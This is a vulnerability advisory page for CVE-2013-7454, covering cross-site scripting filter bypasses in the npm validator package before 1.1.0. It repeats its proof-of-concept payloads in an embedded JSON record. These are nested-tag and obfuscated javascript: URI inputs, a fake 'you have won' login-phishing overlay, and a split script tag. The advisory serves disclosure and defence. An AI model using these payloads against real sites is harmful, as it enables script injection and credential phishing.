GHSA-Q4QQ-FM7Q-CWP5

Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2021-09-16 19:30
VLAI?
Summary
Multiple XSS Filter Bypasses in validator
Details

Versions of validator prior to 1.1.0 are affected by several cross-site scripting vulnerabilities due to bypasses discovered in the blacklist-based filter.

Proof of Concept

Various inputs that could bypass the filter were discovered:

Improper parsing of nested tags:

<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>

Incomplete filtering of javascript: URIs:

<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>

UI Redressing:

<div style="z-index: 9999999; background-color: green; width: 100%; height: 100%">
<h1>You have won</h1>Please click the link and enter your login details:
<a href="http://example.com/">http://good.com</a>
</div>

Bypass via Nested Forbidden Strings:

<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>

Additional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter's XSS filtering function, which this code was based off of.

Recommendation

If you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (<, >), ampersands, and quotation marks, so no HTML tags will be processed.

Severity ?
6.1 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "validator"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2013-7454"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:50:57Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "Versions of `validator` prior to 1.1.0 are affected by several cross-site scripting vulnerabilities due to bypasses discovered in the blacklist-based filter.\n\n\n## Proof of Concept\nVarious inputs that could bypass the filter were discovered:\n\nImproper parsing of nested tags:\n\n```\n\u003cs \u003conmouseover=\"alert(1)\"\u003e \u003c;s onmouseover=\"alert(1)\"\u003eThis is a test\u003c/s\u003e\n```\n\nIncomplete filtering of javascript: URIs:\n\n```\n\u003ca href=\"javascriptJ a V a S c R iPt::alert(1)\" \"\u003cs\u003e\"\u003etest\u003c/a\u003e\n```\n\nUI Redressing:\n\n```\n\u003cdiv style=\"z-index: 9999999; background-color: green; width: 100%; height: 100%\"\u003e\n\u003ch1\u003eYou have won\u003c/h1\u003ePlease click the link and enter your login details:\n\u003ca href=\"http://example.com/\"\u003ehttp://good.com\u003c/a\u003e\n\u003c/div\u003e\n```\n\nBypass via Nested Forbidden Strings:\n\n```\n\u003cscrRedirecRedirect 302t 302ipt type=\"text/javascript\"\u003eprompt(1);\u003c/scrRedirecRedirect 302t 302ipt\u003e\n```\n\nAdditional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter\u0027s XSS filtering function, which this code was based off of.\n\n\n## Recommendation\n\nIf you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (\u003c, \u003e), ampersands, and quotation marks, so no HTML tags will be processed.",
  "id": "GHSA-q4qq-fm7q-cwp5",
  "modified": "2021-09-16T19:30:36Z",
  "published": "2017-10-24T18:33:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7454"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-q4qq-fm7q-cwp5"
    },
    {
      "type": "WEB",
      "url": "https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/41"
    },
    {
      "type": "WEB",
      "url": "http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Multiple XSS Filter Bypasses in validator"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.